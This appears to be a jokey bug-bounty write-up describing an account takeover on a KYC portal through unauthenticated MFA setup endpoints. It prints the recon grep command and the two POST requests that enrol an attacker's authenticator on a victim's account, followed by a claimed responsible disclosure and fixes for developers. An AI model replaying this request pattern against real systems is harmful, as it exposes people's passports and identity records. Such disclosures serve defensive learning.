๐ŸŽฏ The Target (Redacted ๐Ÿ‘€)

So I found this "secure" portal handling:

  • KYC ๐Ÿ“„
  • Passports ๐Ÿ›‚
  • Compliance data ๐Ÿ“Š

And of course, it had:

๐Ÿ‘‰ Email login ๐Ÿ‘‰ MFA

So naturally I said:

"Yeahโ€ฆ I'm not getting in."

5 minutes later: "I'm definitely getting in." ๐Ÿ˜ญ

๐Ÿง  Phase 1: OSINT โ€” LinkedIn is the Real Hacker Tool

I needed a valid user.

So I did elite-level reconnaissance:

๐Ÿ‘‰ Open LinkedIn ๐Ÿ‘‰ Find employee ๐Ÿ‘‰ Guess email

That's it.

OSINT tools? Yes. Brain? Optional.

๐Ÿ” Phase 2: View Source โ€” Because Curiosity Killsโ€ฆ Security

Opened login page โ†’ View Source

Nothing interesting.

But then I remembered:

๐Ÿ‘‰ "This is Next.jsโ€ฆ there HAS to be chunk files."

So I grabbed a JS file and ran:

grep -oEi '"/[a-z0-9/_-]{3,}"'

And suddenlyโ€ฆ

๐Ÿ’ฅ Main character moment

/api/setup-mfa
/api/complete-mfa-setup

Me: "Why are these publicโ€ฆ?" Also me: "Don't ask questions. Exploit." ๐Ÿ˜Œ

๐Ÿšจ Phase 3: The "No Way This Works" Request

I sent:

POST /api/setup-mfa
{
  "email": "target@company.com"
}

Response:

  • Secret โœ…
  • QR Code โœ…
  • Happiness โŒ (because this should NOT happen)

At this point I knewโ€ฆ This wasn't a bug. This was a lifestyle choice by the backend.

๐Ÿงช Phase 4: QR Code = Unauthorized Life Access

Converted base64 โ†’ QR โ†’ scanned it.

Now my phone was generating OTPs for someone else's account.

Microsoft Authenticator: "Welcome ๐Ÿ‘‹R" Me: quot;I don't even belong hereโ€ฆ" ๐Ÿ’€

๐Ÿ˜ญ Phase 5: Reality Check (It Didn't Work)

Tried logging in.

โŒ Failed.

And I was like:

"Okayโ€ฆ security team did SOMETHING at least."

Almost gave up.

Closed terminal.

Opened Instagram,Started scolling.

Thenโ€ฆ

โšก Phase 6: Hacker Instinct Kicks In

Brain:

"You found TWO endpointsโ€ฆ don't be lazy."

Right.

/api/complete-mfa-setup

Endpoint name: complete-mfa-setup Me: "Oh so you WANT me to finish it?" ๐Ÿ˜

๐Ÿง  Phase 7: Final Boss Fight

From JS clues:

  • secret
  • verificationCode

So I sent:

POST /api/complete-mfa-setup
{
  "email": "target@company.com",
  "secret": "<secret>",
  "verificationCode": "<OTP from my phone>"
}

๐Ÿ’ฅ BOOM.

"MFA setup completed successfully"

Me staring at screen: "This is why we can't have nice things." ๐Ÿ˜ญ

๐Ÿ Phase 8: The "Waitโ€ฆ I'm Actually In" Scene

Login again:

  • Email โœ…
  • OTP (mine ๐Ÿ˜Ž) โœ…

Andโ€ฆ

๐Ÿšช ACCESS GRANTED

๐Ÿ’€ What I Found Inside

  • Passports ๐Ÿ›‚
  • KYC docs ๐Ÿ“„
  • Compliance data ๐Ÿ“Š

Basically:

๐Ÿ‘‰ "Congratulations, you've unlocked GDPR violation DLC." ๐ŸŽฎ

๐Ÿ“Š Attack Flow (Visual)

None

โš ๏ธ Why This Is INSANE

This is basically:

  • โŒ MFA without authentication
  • โŒ Identity not verified
  • โŒ Backend trusting anyone
  • โŒ Complete auth bypass

All you need:

๐Ÿ‘‰ Email address

That's it.

๐Ÿงฏ Responsible Disclosure

Before anyone panics:

  • No data touched โŒ
  • No data downloaded โŒ
  • Reported responsibly โœ…

Ethical hacker mode: ON Chaos mode: OFF

๐Ÿง  Developer Takeaways

If you're building auth systems:

  • ๐Ÿ”’ NEVER allow MFA setup without login
  • ๐Ÿ”’ Always bind actions to session
  • ๐Ÿ”’ Validate user identity server-side
  • ๐Ÿ”’ Stop trusting frontend like it's your best friend

๐ŸŽฌ Final Thoughts

Time taken:

โฑ๏ธ ~10 minutes ๐Ÿง  1 brain cell ๐Ÿ“ง 1 email

Impact:

๐Ÿ’€ Total account takeover

MFA is supposed to STOP attackersโ€ฆ not onboard them.

"At this point, the only factor in Multi-Factor Authenticationโ€ฆ was me."